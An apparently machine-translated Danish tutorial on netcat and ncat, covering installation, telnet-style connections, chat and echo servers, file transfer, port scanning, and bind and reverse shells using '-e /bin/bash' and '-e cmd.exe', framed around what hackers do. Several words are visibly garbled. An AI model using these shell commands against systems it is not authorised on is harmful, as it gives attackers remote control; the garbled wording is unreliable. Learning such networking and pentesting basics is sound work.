Netcat

Netcat er et terminal-program, der svarer til en telnet-program, men har mange flere funktioner.

det er en “PO .er version” af det traditionelle telnet-program. bortset fra grundlæggende telnetfunktioner kan det gøre forskellige andre ting som at oprette socket-servere til at lytte til indgående forbindelser på Porte, overføre filer fra terminalen osv.

så det er et lille værktøj, der er fyldt med masser af funktioner., Derfor kaldes den”Sch .ei .iske hær kniv til TCP/IP”.

netcat-manualen definerer netcat som

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

så dybest set er netcat et værktøj til at udføre tovejs netværkskommunikation over TCP/UDP-protokollerne.

mere teknisk set kan netcat fungere som en socket-server eller klient og interagere med andre programmer samtidig med at sende og modtage data via netværket.

en sådan definition lyder for generisk og gør det svært at forstå, hvad dette værktøj gør, og hvad er det nyttigt for., Dette kan kun forstås ved at bruge og lege med det.

Ncat

så den første ting at gøre ville være at opsætte netcat på din maskine. Netcat kommer i forskellige varianter. Betyder, at det er tilgængeligt fra flere leverandører.

men de fleste af dem har lignende funktionalitet. På Ubuntu er der 3 pakker kaldet netcat-openbsd, netcat-traditionel og ncat.

min foretrukne version er NCAT. Ncat er udviklet af nmap-teamet er det bedste af alle tilgængelige netcats og vigtigst af alt dets tværplatform og fungerer meget godt på .indo .s.,

Projektets hjemmeside:

Install Ncat på Windows

Windows-version af netcat kan hentes fra

du skal Blot downloade og udpakke filerne et sted egnet.

Eller download ncat windows-version

Install Ncat på Ubuntu / Linux Mint / Linux

Ubuntu syntaptic pakke har netcat-openbsd og netcat-traditional-pakker til rådighed. Installer dem begge. Nmap leveres også med en netcat-implementering kaldet NCAT. Installer det også.,

Installer på Ubuntu

$ sudo apt-get install netcat-traditional netcat-openbsd nmap

for at bruge netcat-OpenBSD implementering brug “nc” kommando.
for at bruge netcat-traditionel implementering brug “nc.traditionel ” kommando
for at bruge nmap ncat skal du bruge kommandoen “ncat”.

Netcat-Kommandoeksempler

i den følgende vejledning vil vi bruge dem alle i forskellige eksempler på forskellige måder.

Telnet

den allerførste ting netcat kan bruges som er et telnet-program. Lad os se hvordan.

$ nc -v google.com 80

nu er netcat tilsluttet google.com på port 80 og dens tid til at sende nogle besked., Lad os prøve at hente indekssiden. For denne type “få indeks.html HTTP / 1.1” og tryk på Enter-tasten to gange. Husk to gange.

udgangen fra google.com er blevet modtaget og gentaget på terminalen.

Simple socket server

for at åbne en simpel socket server type i følgende kommando.

$ nc -l -v 1234

ovenstående kommando betyder : Netcat lyt til TCP-port 1234. – V-indstillingen giver verbose output for bedre forståelse., Nu fra en anden terminal forsøger at oprette forbindelse til port 1234 ved hjælp af telnet-kommandoen som følger :

$ telnet localhost 1234Trying 127.0.0.1...Connected to localhost.Escape character is '^]'.abcting tong

Efter at du har sluttet, at vi sender nogle test besked som abc og ting tong til netcat socket-server. Netcat socket-serveren gentager de data, der er modtaget fra telnet-klienten.

$ nc -l -v 5555Connection from 127.0.0.1 port 5555 acceptedabcting tong

Dette er et komplet Chatsystem. Skriv noget i netcat terminal, og det vil dukke op i telnet terminal så godt. Så denne teknik kan bruges til at chatte mellem 2 maskiner.,

komplet ECHO-Server

Ncat med-C-indstillingen kan bruges til at starte en echo-server. Kilde

Start echo-serveren ved hjælp af ncat som følger

$ ncat -v -l -p 5555 -c 'while true; do read i && echo $i; done'

Nu fra en anden terminal oprette forbindelse ved hjælp af telnet og skriver noget. Det vil blive sendt tilbage med “” præfikset.
netcat-openbsd-versionen har ikke-C-indstillingen. Husk altid at bruge-V mulighed for verbose output.

Bemærk : Netcat kan få besked om at gemme dataene i en fil i stedet for at gentage dem til terminalen.,

$ nc -l -v 1234 > data.txt

Opret UDP-Server

Netcat fungerer også med UDP-porte. For at starte en netcat-server, der bruger udp-porte, brug -u option

$ nc -v -ul 7000

UDP-Klient

oprettelse af Forbindelse til denne server at bruge netcat fra en anden terminal

$ nc localhost -u 7000

Nu begge terminaler kan chatte med hinanden.

filoverførsel

en hel fil kan overføres med netcat. Her er et hurtigt eksempel.

en maskine A – Send fil

$ cat happy.txt | ncat -v -l -p 5555Ncat: Version 5.21 ( http://nmap.org/ncat )Ncat: Listening on 0.0.0.0:5555

i ovenstående kommando læser og udsender cat-kommandoen indholdet af happy.t .t., Udgangen gentages ikke til terminalen, i stedet ledes eller føres til ncat, der har åbnet en socket-server på port 5555.

På maskine B – Modtager-Fil

$ ncat localhost 5555 > happy_copy.txt

I den ovenstående kommando ncat vil oprette forbindelse til localhost på port 5555, og hvad det modtager, vil blive skrevet til happy_copy.t .t

nu happy_copy.t .t vil være en kopi af happy.t .t da de data, der sendes over port 5555, er indholdet af happy.t .t i den forrige kommando.

Netcat sender kun filen til den første klient, der opretter forbindelse til den. Efter at dens over.,
og efter den første klient lukker forbindelsen, vil netcat server også lukke forbindelsen.

portscanning

Netcat kan også bruges til portscanning. Dette er dog ikke en korrekt brug af netcat, og et mere anvendeligt værktøj som nmap skal bruges.

parameteren “-n” forhindrer her DNS-opslag,” -.” får nc til ikke at modtage nogen data fra serveren, og “- 1 1” gør forbindelsen timeout efter 1 sekund af inaktivitet.

Remote Shell/Backdoor

Ncat kan bruges til at starte en grundlæggende shell på et remote system på en port uden brug af ssh., Her er et hurtigt eksempel.

$ ncat -v -l -p 7777 -e /bin/bash

ovenstående vil starte en server på port 7777 og vil videregive alle indgående input til bash kommando, og resultaterne vil blive sendt tilbage. Kommandoen konverterer grundlæggende bash-programmet til en server. Så netcat kan bruges til at konvertere enhver proces til en server.

oprette Forbindelse til dette bash shell hjælp nc fra en anden terminal

$ nc localhost 7777

Nu kan du prøve at udføre enhver kommando, der gerne hjælpe , ls , pwd osv.

Windowsindo .s

på windowsindo .s maskine cmd.,e .e (dos prompt program) bruges til at starte en lignende shell ved hjælp af netcat. Syntaksen for kommandoen er den samme.

C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exelistening on 8888 ...connect to from (UNKNOWN) 1182

Nu er en anden konsol kan oprette forbindelse ved hjælp af telnet-kommandoen

Selv om netcat, men kan bruges til remote setup skaller, er ikke nyttigt for at få en interaktiv skal på et eksternt system, fordi i de fleste tilfælde netcat ikke ville være installeret på et eksternt system.

den mest effektive metode til at få en skal på en ekstern maskine ved hjælp af netcat er ved at oprette omvendte skaller.,

Reverse Shells

Dette er den mest kraftfulde funktion af netcat, som det er mest brugt af hackere. Netcat bruges i næsten alle reverse shell teknikker til at fange den omvendte forbindelse af shell program fra et hacket system.

Reverse telnet

lad os først tage et eksempel på en simpel omvendt telnetforbindelse. I ordinate telnet forbindelse klienten opretter forbindelse til serveren for at starte en kommunikationskanal.

Your system runs (# telnet server port_number) =============> Server

nu ved hjælp af ovenstående teknik kan du oprette forbindelse til at sige port 80 på serveren for at hente en serverebside., Men en hacker er interesseret i at få en kommando shell. Dens kommandoprompten af windowsindo .s eller terminalen af Linu.. Kommandoskallen giver ultimativ kontrol over fjernsystemet. Nu er der ingen service, der kører på den eksterne server, som du kan oprette forbindelse til og få en kommandoskal.

så når en hacker hacker ind i et system, skal han få en kommandoskal. Da det ikke er muligt direkte, er løsningen at bruge en omvendt skal. I en omvendt shell starter serveren en forbindelse til hackerens maskine og giver en kommando shell.,

Step 1 : Hacker machine (waiting for incoming connection)Step 2 : Server ==============> Hacker machine

for at vente på indgående forbindelser skal en lokal socket-lytter åbnes. Netcat / ncat kan gøre dette.
først skal en netcat-server startes på lokal maskine eller hackerens maskine.

maskine a

$ ncat -v -l -p 8888Ncat: Version 6.00 ( http://nmap.org/ncat )Ncat: Listening on :::8888Ncat: Listening on 0.0.0.0:8888

ovenstående vil starte en socket server (lytter) på port 8888 på lokal maskine / hacker maskine.

nu skal en omvendt skal lanceres på målmaskinen / hacket maskine. Der er en række måder at starte omvendte skaller på.,

Efter en metode til at arbejde, hacker-enten skal være i stand til at udføre vilkårlig kommando på systemet eller bør være i stand til at uploade en fil, der kan udføres ved at åbne browseren (ligesom et php-script).

i dette eksempel gør vi ikke nogen af de ovennævnte ting. Vi skal bare køre netcat på serveren også at kaste en omvendt kommando shell til at demonstrere konceptet. Så netcat skal installeres på serveren eller målmaskinen.,

Maskine B :

$ ncat localhost 8888 -e /bin/bash

Denne kommando vil oprette forbindelse til En maskine på port 8888 og foder i produktionen af bash effektivt at give en skal ” til at maskinen A. Nu En maskine, der kan udføre enhver kommando på maskine B.

Maskine

I en reel hacking/penetration test scenarie, det ikke er muligt at køre netcat på målcomputeren. Derfor anvendes andre teknikker til at skabe en skal. Disse omfatter uploade reverse shell php scripts og køre dem ved at åbne dem i Bro .seren. Eller starte en bufferoverløb udnytte til at udføre reverse shell nyttelast.,

konklusion

så i ovenstående eksempler så vi, hvordan man bruger netcat til forskellige netværksaktiviteter som telnet, reverse shells osv. Hackere bruger det meste til at skabe hurtige omvendte skaller.

i denne tutorial dækkede vi nogle af de grundlæggende og almindelige anvendelser af netcat. Tjek articleikipedia-artiklen for mere information om, hvad netcat ellers kan gøre.

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *